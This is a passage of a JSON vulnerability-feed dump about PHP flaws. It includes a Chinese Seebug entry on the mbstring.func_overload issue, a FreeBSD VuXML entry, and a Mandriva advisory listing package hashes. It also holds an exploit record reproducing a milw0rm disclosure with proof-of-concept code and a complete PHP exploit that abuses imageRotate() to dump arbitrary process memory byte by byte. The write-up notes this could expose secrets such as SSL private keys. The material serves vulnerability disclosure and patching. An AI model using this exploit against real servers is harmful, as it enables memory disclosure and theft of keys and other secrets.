4.4.4\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://snaps.php.net/\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Moderate: php security update\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nModerate: php security update\uff1aModerate: php security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/Moderate-Moderate:.html\r\n\r\nGentoo\r\n------\r\nGentoo\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08GLSA 201001-03\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nGLSA 201001-03\uff1aPHP: Multiple vulnerabilities\r\n\u94fe\u63a5\uff1ahttp://security.gentoo.org/glsa/201001-03.xml", "published": "2010-01-08T00:00:00", "title": "PHP mbstring.func_overload Webserver\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0754"], "modified": "2010-01-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15209", "id": "SSV:15209", "sourceData": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": ""}], "freebsd": [{"lastseen": "2019-05-29T18:34:19", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5498"], "description": "\nAccording to CVE-2008-5498 entry:\n\nArray index error in the \"imageRotate\" function in PHP 5.2.8 and\n\t earlier allows context-dependent attackers to read the contents\n\t of arbitrary memory locations via a crafted value of the third\n\t argument (aka the \"bgd_color\" or \"clrBack\" argument) for an indexed\n\t image.\n\n", "edition": 4, "modified": "2009-02-04T00:00:00", "published": "2008-12-24T00:00:00", "id": "58A3C266-DB01-11DD-AE30-001CC0377035", "href": "https://vuxml.freebsd.org/freebsd/58a3c266-db01-11dd-ae30-001cc0377035.html", "title": "php5-gd -- uninitialized memory information disclosure vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:40", "description": "\nPHP 5.2.8 gd library - imageRotate() Information Leak", "edition": 1, "published": "2009-01-02T00:00:00", "title": "PHP 5.2.8 gd library - imageRotate() Information Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5498"], "modified": "2009-01-02T00:00:00", "id": "EXPLOITPACK:8031F12D158C68C17F94DE3A1736800F", "href": "", "sourceData": "PHP - gd library - imageRotate()function Information Leak Vulnerability\n\nDiscovered by: Hamid Ebadi, \nFurther research and exploit: Mohammad R. Roohian\nCSIRT Team Members\nAmirkabir University APA Laboratory\n\nIntroduction\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\n\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\n\nVulnerableversion\nPHP <= 5.2.8\nCVE Candidate Number: CVE-2008-5498\n\nVulnerability\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\nA correct validation check for the indexed images could be:\n\nfile: php-x.y.z/ext/gd/libgd/gd.c\n\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\n int clrBack, int ignoretransparent) \n3130:{ \n3131: gdImagePtrpMidImg; \n3132: gdImagePtrrotatedImg;\n3133:\n3134: if(src == NULL) { \n3135: returnNULL; \n3136: }\n3137:+\n3137:+ // Index check\n3137:+ if (!src->truecolor) \n3137:+ clrBack &= 0xff; // Just keep the first byte\n3137:+\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \n3139: returnNULL; \n3140: }\n\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\n\nfile: php-x.y.z/ext/gd/libgd/gd.h\n\ntypedef struct gdImageStruct { \n \n --snip snip -- \n \n intred[gdMaxColors]; \n intgreen[gdMaxColors]; \n intblue[gdMaxColors]; \n \n --snip snip -- \n \n intalpha[gdMaxColors]; \n /*Truecolor flag and pixels. New 2.0 fields appear here at the \n endto minimize breakage of existing object code. */ \n inttrueColor; \n \n --snip snip -- \n \n} gdImage; \n\ntypedef gdImage * gdImagePtr; \n\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \n\nfile: php-x.y.z/ext/gd/libgd/gd.h\n\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\n ((r)<< 16) + \\\n ((g)<< 8) + \\\n (b))\n\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address.\n\nProof of concept:\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\n\n<?php\n\n$img = imagecreate(5,5);\n$tmp = imagerotate ($img,5,-9999999);\n\n?>\nExploitation :\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\n\n<?php \n&special_index = /* index of the$address */\n$r=imagecreate(300,300); \n$gray = imagecolorallocate( $r,111,111,111); \nimagefilledrectangle($r,0,0,300,300,$gray);\n$tmp =imagerotate( $r, 30,&special_index ); \nimagePng( $tmp, \"test.png\" ); \n?>\n\n\n --------\n|f_b/\\\t |\n| / \\\t |\n| / \\ |\n|/image\t\\|\n|\\ /|\n| \\ / |\n| \\ /\t |\n| \\/\t |\n --------\n\nTo read encoded memory values from a desired address, we have to use the following script:\n\n<?php\n\n$address = /*address to read should bemultiply of 4 */\n$src = 0x84cde2c; \n// depends on the image size and phpscript length but is constant\n$index_b = -(int)(($src - $address +0x810)/4);\n\n$img = imagecreate(5,5);\n$tmp = imagerotate ($img,5,$index_b);\n$f_b = imagecolorat( $tmp,0,0);\n\n?>\n\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\nThe color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\n$f_b = gdTrueColorAlpha( M[$address-512],\n M[$address-255],\n M[$address+0],\n M[$address+1034]);\n\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\nDecoding $f_b\nAs you can see in the source code $f_b is calculated like this:\n----------------------------------------------------------\na\t:A4\tA3\tA2\tA1\nr\t:\tR4\tR3\tR2\tR1\ng\t:\t\tG4\tG3\tG2\tG1\nb\t:\t\t\tB4\tB3\tB2\tB1\n----------------------------------------------------------\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\n----------------------------------------------------------\n\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u00c2\u2013 G1. \nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\n\n\n\nExploit: \n<?php \n/* \nedi = src \nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \n\n( \n\tzend_bool magic_quotes_sybase;\t\t\tMQS \n\tzend_bool safe_mode;\t\t\t\tSM \n\tzend_bool allow_call_time_pass_reference;\t\tAPR \n\tzend_bool implicit_flush;\t\t\t\tIF \n) \n\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \nmov ebx, [edi+esi*4+10] \n\ntest case: \nedi = 0x084c6128 \nesi = 0xffee07b1(-1177679) values less than this will crash. \n=> \nebx = 0x8047ff6 \n\nif (a>127) { \n\ta = 127; \n} \n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \n*/ \n$debug = 0; \n$address = hexdec($argv[1]); \n$addressSave = $address; \n$count = $argv[3]+1; \n$mode = $argv[2]; \n$src = 0x84cde2c; \n$s = 10; //image size \n\n$GLOBALS[\"image\"]=imagecreate($s,$s); \n$r = $GLOBALS[\"image\"]; \nif( $debug ) \n\techo \"Image created.\\n\"; \n\nfunction getDataFromImage( $index ) { \n\t$tmp = imagerotate ($GLOBALS[\"image\"],5,$index); \n\treturn imagecolorat( $tmp, 0,0); \n} \n\n$eor = 0; \nwhile( $address < $addressSave+$count*4 ) { \n\t// indexes \n\t$index_b = (int)(($src - $address + 0x810)/4); \n\t$index_g = $index_b + 256; \n\t$index_r = $index_b + 512; \n\t$index_a = $index_b - 1034; \n\t//$index_gG is the same as index of r \n\t$index_gR = $index_g + 512; \n\t//$index_rG is the same as index of gR \n\t//$index_gGg is the same as index of gR \n\n\t// fuctions \n\t$f_b = getDataFromImage( -$index_b ); \n\t$f_g = getDataFromImage( -$index_g ); \n\t$f_r = getDataFromImage( -$index_r ); \n\t$f_a = getDataFromImage( -$index_a ); \n\t$f_gR = getDataFromImage( -$index_gR ); \n\n\t/********************* Byte 1 **********************/ \n\n\t// b byte 1 \n\t$byte_b1 = $f_b & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:1-0x%x\\n\", $byte_b1 ); \n\n\t//g byte 1 \n\t$byte_g1 = $f_g & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"g:1-0x%x\\n\", $byte_g1 ); \n\n\t//r byte 1 \n\t$byte_r1 = $f_r& 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"r:1-0x%x\\n\", $byte_r1 ); \n\n\t//a byte 1 \n\t$byte_a1 = $f_a & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"a:1-0x%x\\n\\n\", $byte_a1 ); \n \n\t/* Relative */ \n\n\t// gG byte 1 \n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \n\t$byte_gG1 = $byte_r1; \n\n\t// gR byte 1 \n\t// this is relative r to `g`( suppose that 'g' is a b) \n\t$byte_gR1 = $f_gR & 0x000000ff; \n\n\t// rG byte 1 \n\t// this is relative g to r( suppose that 'r' is a b) \n\t$byte_rG1 = $byte_gR1; \n\n\t/* 2 Level Relative */ \n\n\t// gGg byte 1 \n\t// this is relative g to `gG`( suppose that 'gG' is a b) \n\t$byte_gGg1 = $byte_gR1; \n\n\t/********************* Byte 2 **********************/ \n\n\t// b byte 2 \n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \n\t$borrow_b2 = 0; \n\tif( $byte_b2 < 0 ) \n\t\t$borrow_b2 = 1; \n\t$byte_b2 = $byte_b2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:2-0x%x \\t0x%x\\n\", $byte_b2, $f_b ); \n\n\t// g byte 2 \n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \n\t$borrow_g2 = 0; \n\tif( $byte_g2 < 0 ) \n\t\t$borrow_g2 = 1; \n\t$byte_g2 = $byte_g2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"g:2-0x%x \\t0x%x\\n\", $byte_g2, $f_gG1 ); \n\n\t// r byte 2 \n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \n\t$byte_r2 = $byte_r2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"r:2-0x%x \\t0x%x\\n\\n\", $byte_r2, $sum_r2_rG1 ); \n\n\t/* Relative */ \n\n\t// gG byte 2 \n\t$byte_gG2 = $byte_r2; \n\n\t/********************* Byte 3 **********************/ \n\n\t// b byte 3 \n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \n\t$borrow_b3 = 0; \n\tif( $byte_b3 < 0 ) \n\t{ \n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \n\t\tif( $debug ) \n\t\t\tprintf( \"\\nborrow was: %d\\n\" , $borrow_b3 ); \n\t} \n\t$byte_b3 = $byte_b3 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:3-0x%x \\t0x%x\\n\", $byte_b3, $sum_b3_g2 ); \n\n\t// g byte 3 \n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \n\t$byte_g3 = $byte_g3 & 0x000000ff; \n\tif( $debug ) { \n\t\tprintf( \"f_g: 0x%x\\n\" , $f_g); \n\t\tprintf( \"sum_g3_gG2_gR1_br2: 0x%x\\n\" , $sum_g3_gG2_gR1_br2 ); \n\t\tprintf( \"sum_g3_gG2_gR1: 0x%x\\n\" , $sum_g3_gG2_gR1 ); \n\t\tprintf( \"sum_g3_gG2: 0x%x\\n\" , $sum_g3_gG2 ); \n\t\tprintf( \"g:3-0x%x \\t0x%x\\n\\n\", $byte_g3, $sum_b3_g2 ); \n\t} \n\n\t/********************* Byte 4 **********************/ \n\n\t// b byte 4 \n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \n\t$byte_b4 = $byte_b4 & 0x000000ff; \n\tif( $debug ) { \n\t\tprintf( \"f_b: 0x%x\\n\" , $f_b); \n\t\tprintf( \"sum_b4_g3_r2_a1_br3: 0x%x\\n\" , $sum_b4_g3_r2_a1_br3 ); \n\t\tprintf( \"sum_b4_g3_r2_a1: 0x%x\\n\" , $sum_b4_g3_r2_a1 ); \n\t\tprintf( \"sum_b4_g3_r2: 0x%x\\n\" , $sum_b4_g3_r2 ); \n\t\tprintf( \"sum_b4_g3: 0x%x\\n\" , $sum_b4_g3 ); \n\t\tprintf( \"b:4-0x%x\\n\\n\", $byte_b4); \n\t} \n\t/********************* Byte **********************/ \n\n\tif($mode == 0) { //text mode \n\t\tprintf( \"%c%c%c%c\", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \n\t} elseif( $mode == 1) { \n\t\t// b \n\t\tif( !$eor ) \n\t\t\tprintf( \"0x%x:\\t\", $address ); \n\t\tprintf( \"0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t\", $byte_b1, $byte_b1, \n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \n\n\t\t$eor = !$eor; \n\t\tif( !$eor ) \n\t\t\techo \"\\n\"; \n\t} else { \n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \n\t\tprintf( \"0x%x: 0x%x\\n\", $address, $val ); \n\t} \n\t$address+=4; \n} \n?> \n \nCredit\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\nautcert@aut.ac.ir\nhttps://www.ircert.cc\n\nDisclosure: October 2008\nReport to vendor: December, 10, 2008\n\n# milw0rm.com [2009-01-02]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2009-0754"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:066\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : March 5, 2009\r\n Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows\r\n local users to modify behavior of other sites hosted on the same\r\n web server by modifying the mbstring.func_overload setting within\r\n .htaccess, which causes this setting to be applied to other virtual\r\n hosts on the same server (CVE-2009-0754).\r\n \r\n The updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0754\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 6817b7fc8cecb169e0d76a138517f09b 2008.0/i586/libphp5_common5-5.2.4-3.5mdv2008.0.i586.rpm\r\n f484adb8d06c538cbe2a05b2dda13660 2008.0/i586/php-bcmath-5.2.4-3.5mdv2008.0.i586.rpm\r\n 20d672144688deca9c042de5c435d91d 2008.0/i586/php-bz2-5.2.4-3.5mdv2008.0.i586.rpm\r\n b6d95c8fdc4ac65642711b65a35baf73 2008.0/i586/php-calendar-5.2.4-3.5mdv2008.0.i586.rpm\r\n e78ff4e9aeaa54a919dff7cc9ade7e8d 2008.0/i586/php-cgi-5.2.4-3.5mdv2008.0.i586.rpm\r\n 4cbe8f23c20839d9beb07db50c484d8c 2008.0/i586/php-cli-5.2.4-3.5mdv2008.0.i586.rpm\r\n c62c71bf6178eb7e317365f25bb51101 2008.0/i586/php-ctype-5.2.4-3.5mdv2008.0.i586.rpm\r\n 6a179db52f5020a714d7c20a5a970b1c 2008.0/i586/php-curl-5.2.4-3.5mdv2008.0.i586.rpm\r\n 43a34e79b95814d7193ff830b0aa7dff 2008.0/i586/php-dba-5.2.4-3.5mdv2008.0.i586.rpm\r\n 639080e8f223734bb0c437d3def33bc9 2008.0/i586/php-dbase-5.2.4-3.5mdv2008.0.i586.rpm\r\n f019479e8eeaff7258276262480a9f86 2008.0/i586/php-devel-5.2.4-3.5mdv2008.0.i586.rpm\r\n b74e45c4bc7f486c35af5ca2440e2d58 2008.0/i586/php-dom-5.2.4-3.5mdv2008.0.i586.rpm\r\n 599c9b02ed80c5f441009e82f3402aae 2008.0/i586/php-exif-5.2.4-3.5mdv2008.0.i586.rpm\r\n 637a3269eb564aff3ffb661e353a5d22 2008.0/i586/php-fcgi-5.2.4-3.5mdv2008.0.i586.rpm\r\n 2dfa53416e0c26124fc628c35fe667a6 2008.0/i586/php-filter-5.2.4-3.5mdv2008.0.i586.rpm\r\n ae04ec182eb2b316a5e60997cd22cb13 2008.0/i586/php-ftp-5.2.4-3.5mdv2008.0.i586.rpm\r\n dd3dddbd177d90366286effb8d4f9ec5 2008.0/i586/php-gd-5.2.4-3.5mdv2008.0.i586.rpm\r\n a5611d7d3fdb55aaf88da43df3ce59c9 2008.0/i586/php-gettext-5.2.4-3.5mdv2008.0.i586.rpm\r\n 8fc8d0a71d2082b9299f1117d865a5d3 2008.0/i586/php-gmp-5.2.4-3.5mdv2008.0.i586.rpm\r\n 0dcbf024ff676650a2c90756719086be 2008.0/i586/php-hash-5.2.4-3.5mdv2008.0.i586.rpm\r\n 923408f205ea7dcc69fe80033aead819 2008.0/i586/php-iconv-5.2.4-3.5mdv2008.0.i586.rpm\r\n 2b19ee8e0703fb6cbca2a057739d361f 2008.0/i586/php-imap-5.2.4-3.5mdv2008.0.i586.rpm\r\n 29604f30dda9d43aaf1fc282dc60045c 2008.0/i586/php-json-5.2.4-3.5mdv2008.0.i586.rpm\r\n 6d6cf52d57990b433d906b12d42fec8b 2008.0/i586/php-ldap-5.2.4-3.5mdv2008.0.i586.rpm\r\n a7783cf72a398d332994a85075712666 2008.0/i586/php-mbstring-5.2.4-3.5mdv2008.0.i586.rpm\r\n 14e2af6102e379dd30340b4805dc850c 2008.0/i586/php-mcrypt-5.2.4-3.5mdv2008.0.i586.rpm\r\n 19be3f1680243918d2130b697d2622c4 2008.0/i586/php-mhash-5.2.4-3.5mdv2008.0.i586.rpm\r\n 3b27d5f0741e3e7de3e624f2c18f2b46 2008.0/i586/php-mime_magic-5.2.4-3.5mdv2008.0.i586.rpm\r\n ebd764876db84efd8a17faa6ae9b5f7a 2008.0/i586/php-ming-5.2.4-3.5mdv2008.0.i586.rpm\r\n 5814f12508453ba950da5ba6cefbaac5 2008.0/i586/php-mssql-5.2.4-3.5mdv2008.0.i586.rpm\r\n 85f18345bec730a7ac1f0919e9a76fe8 2008.0/i586/php-mysql-5.2.4-3.5mdv2008.0.i586.rpm\r\n f7874e3ad3062a9bb932105f39182a52 2008.0/i586/php-mysqli-5.2.4-3.5mdv2008.0.i586.rpm\r\n de98c96be9807bbd89e5012dfa8fc423 2008.0/i586/php-ncurses-5.2.4-3.5mdv2008.0.i586.rpm\r\n e4a2f64f33628db36a88ba12ebebbc94 2008.0/i586/php-odbc-5.2.4-3.5mdv2008.0.i586.rpm\r\n 303977af11689f7030ad42af5bb6ff0e 2008.0/i586/php-openssl-5.2.4-3.5mdv2008.0.i586.rpm\r\n a4d11ceeaa02b0ab84c242d9eeb234ec 2008.0/i586/php-pcntl-5.2.4-3.5mdv2008.0.i586.rpm\r\n 32fe7ec6429be3b3a475c20b6122ce26 2008.0/i586/php-pdo-5.2.4-3.5mdv2008.0.i586.rpm\r\n 251cd4bb2e5be5ae17acc80acaa2d90a 2008.0/i586/php-pdo_dblib-5.2.4-3.5mdv2008.0.i586.rpm\r\n 840104aa97e5ef8d7b564771071d7514 2008.0/i586/php-pdo_mysql-5.2.4-3.5mdv2008.0.i586.rpm\r\n b2634ef32c2b52cad42cdf83b81acab1 2008.0/i586/php-pdo_odbc-5.2.4-3.5mdv2008.0.i586.rpm\r\n 592033cfa7a18232f31e828928478143 2008.0/i586/php-pdo_pgsql-5.2.4-3.5mdv2008.0.i586.rpm\r\n 4243111fc22b1b35c4c91042ed6698cc 2008.0/i586/php-pdo_sqlite-5.2.4-3.5mdv2008.0.i586.rpm\r\n 901399176ebf6a51da7dfa4951a70ba0 2008.0/i586/php-pgsql-5.2.4-3.5mdv2008.0.i586.rpm\r\n 930403f48f7a8e63648489e6a9d7c33f 2008.0/i586/php-posix-5.2.4-3.5mdv2008.0.i586.rpm\r\n 3aa0d728c4e8861e52e7dc3e770601b4 2008.0/i586/php-pspell-5.2.4-3.5mdv2008.0.i586.rpm\r\n bc5b445e017b3b81fff29b60f6009e93 2008.0/i586/php-readline-5.2.4-3.5mdv2008.0.i586.rpm\r\n 8bbb3b629b9bd6961fc02cd971ff66df 2008.0/i586/php-recode-5.2.4-3.5mdv2008.0.i586.rpm\r\n 0c67ca595b579d0d8b7e7ba2676a58ac 2008.0/i586/php-session-5.2.4-3.5mdv2008.0.i586.rpm\r\n 119c1e24b95396f249dec9103eb317e2 2008.0/i586/php-shmop-5.2.4-3.5mdv2008.0.i586.rpm\r\n 90b49651d35aefbce08862426a2cb824 2008.0/i586/php-simplexml-5.2.4-3.5mdv2008.0.i586.rpm\r\n b1286df6ce6443853b91fadf0b51129a 2008.0/i586/php-snmp-5.2.4-3.5mdv2008.0.i586.rpm\r\n 791e4a8528e0a26a11339ba95f058d81 2008.0/i586/php-soap-5.2.4-3.5mdv2008.0.i586.rpm\r\n 1693234336370401246c34eaea324523 2008.0/i586/php-sockets-5.2.4-3.5mdv2008.0.i586.rpm\r\n a468d0bda163640dd38c2ad4bbea2d20 2008.0/i586/php-sqlite-5.2.4-3.5mdv2008.0.i586.rpm\r\n a59e6dd79bb5451cc8c1ef5f87b9c643 2008.0/i586/php-sysvmsg-5.2.4-3.5mdv2008.0.i586.rpm\r\n f23f1893a95ad352aaf00c6df031dbf2 2008.0/i586/php-sysvsem-5.2.4-3.5mdv2008.0.i586.rpm\r\n 55169c0284852ee1b00ecb5eae3d5a11 2008.0/i586/php-sysvshm-5.2.4-3.5mdv2008.0.i586.rpm\r\n cf3fdc27986b556396ce5ccdfce4ff90 2008.0/i586/php-tidy-5.2.4-3.5mdv2008.0.i586.rpm\r\n 0340cb689cba22be6d71b4148af4f29d 2008.0/i586/php-tokenizer-5.2.4-3.5mdv2008.0.i586.rpm\r\n f1be80919c306e185a137b40f5e84cf4 2008.0/i586/php-wddx-5.2.4-3.5mdv2008.0.i586.rpm\r\n 00149fa518c9700953fe09bf8982706c 2008.0/i586/php-xml-5.2.4-3.5mdv2008.0.i586.rpm\r\n 9d1904ca199f201b4b5bd75491641b65 2008.0/i586/php-xmlreader-5.2.4-3.5mdv2008.0.i586.rpm\r\n 538b4325eb54795ebc1c0df8cdc9ae23 2008.0/i586/php-xmlrpc-5.2.4-3.5mdv2008.0.i586.rpm\r\n 5e1c42b5470bd53b6bb8ced1997505c4 2008.0/i586/php-xmlwriter-5.2.4-3.5mdv2008.0.i586.rpm\r\n 320719a2533d4393afbb57a327f449a5 2008.0/i586/php-xsl-5.2.4-3.5mdv2008.0.i586.rpm\r\n ef91a6f4885a396cc37b5bbdf41c4c2d 2008.0/i586/php-zlib-5.2.4-3.5mdv2008.0.i586.rpm \r\n 9e31bb51fea2c19142048d60ed29d5ac 2008.0/SRPMS/php-5.2.4-3.5mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n 9ee7693384769ee7231bc97ba8e545ad 2008.0/x86_64/lib64php5_common5-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1a503b4133ae9f5ec5cefa73d1357fc0 2008.0/x86_64/php-bcmath-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 9d0743722ec083c4bf075dfdbfd81972 2008.0/x86_64/php-bz2-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n e5df76df69e141c59da615dee8fcd67f 2008.0/x86_64/php-calendar-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n c34027c38419441099d4736e6dc57a10 2008.0/x86_64/php-cgi-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ef4f52115d0d578e6604f425337b9a08 2008.0/x86_64/php-cli-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n fd70de0eabefdd829c9d210ae1c7de9f 2008.0/x86_64/php-ctype-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n cd672978186d2d9a38825a2ad6dfb08b 2008.0/x86_64/php-curl-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 423b000c70c2c97ad7c9155158c6578c 2008.0/x86_64/php-dba-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 0bc239359add4a93f90f02ec967c5775 2008.0/x86_64/php-dbase-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n a83770c05086e4698a738504a857f4ea 2008.0/x86_64/php-devel-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 6197196f01afe3dc3108d2a0cd49abb9 2008.0/x86_64/php-dom-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n de7397904d7a96b82542e594f6c9a424 2008.0/x86_64/php-exif-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n f668b70c1f95da26858383c6a96d356c 2008.0/x86_64/php-fcgi-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 0c18dae1d380805636bfcf63ce7e53c0 2008.0/x86_64/php-filter-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n fab3adf34eb1ba08670d9c0a5a11ba1a 2008.0/x86_64/php-ftp-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 1a1534e640dd00f2916f4c1527fa78a0 2008.0/x86_64/php-gd-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n 99fdd9644f53f7e042a16a0584298830 2008.0/x86_64/php-gettext-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n f35eb6e836a14c37a8fcda315885281d 2008.0/x86_64/php-gmp-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n b5b4dbbbd2bad91a57aeb793b782e3aa 2008.0/x86_64/php-hash-5.2.4-3.5mdv2008.0.x86_64.rpm\r\n ab55262a28e0130ed993d2b104eca63a 